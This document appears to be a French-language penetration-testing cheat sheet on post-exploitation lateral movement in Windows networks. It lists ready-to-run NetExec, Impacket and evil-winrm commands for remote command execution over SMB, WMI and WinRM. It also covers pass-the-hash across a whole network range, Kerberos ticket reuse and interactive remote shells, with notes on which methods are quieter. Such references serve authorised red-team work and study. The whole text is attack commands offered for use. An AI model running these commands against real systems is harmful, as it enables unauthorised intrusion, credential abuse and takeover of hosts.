nxc smb $TARGET -u $USER -p $PASS -x 'whoami'Description: Exécuter une commande via SMB/WMI : vérifier l'accès admin avant de pivoter.
Post-Exploitation
SMB, WMI, WinRM et Kerberos pour se déplacer latéralement entre les hôtes compromis.
nxc smb $TARGET -u $USER -p $PASS -x 'whoami'Description: Exécuter une commande via SMB/WMI : vérifier l'accès admin avant de pivoter.
nxc smb $CIDR -u $USER -H $NTHASH --local-auth -x 'whoami'Description: Pass-the-Hash avec hash local sur toute la plage réseau : trouver la réutilisation.
psexec.py $DOMAIN/$USER:$PASS@$TARGETDescription: Shell interactif via PsExec : crée un service temporaire, bruyant mais fiable.
wmiexec.py $DOMAIN/$USER:$PASS@$TARGETDescription: Shell semi-interactif via WMI : plus discret que PsExec, pas de service créé.
smbexec.py $DOMAIN/$USER:$PASS@$TARGETDescription: Exécution via partage SMB : alternative à PsExec avec moins d'artifacts.
getTGT.py $DOMAIN/$USER -hashes :$NTHASHDescription: Obtenir un TGT avec le hash NT : base pour le mouvement latéral Kerberos.
export KRB5CCNAME=$USER.ccache && nxc smb $TARGET -u $USER -p '' --use-kcacheDescription: Utiliser le ticket ccache pour s'authentifier Kerberos sans mot de passe ni hash.
atexec.py -k -no-pass $DOMAIN/$USER@$TARGET 'whoami'Description: Exécution planifiée via Task Scheduler avec ticket Kerberos : discret et efficace.
nxc winrm $TARGET -u $USER -p $PASSDescription: Vérifier l'accès WinRM : prérequis pour evil-winrm ou les sessions PowerShell distantes.
evil-winrm -i $TARGET -u $USER -p $PASSDescription: Shell PowerShell interactif via WinRM : pratique pour post-exploitation et upload/download.
evil-winrm -i $TARGET -u $USER -H $NTHASHDescription: WinRM avec Pass-the-Hash : accès sans mot de passe en clair.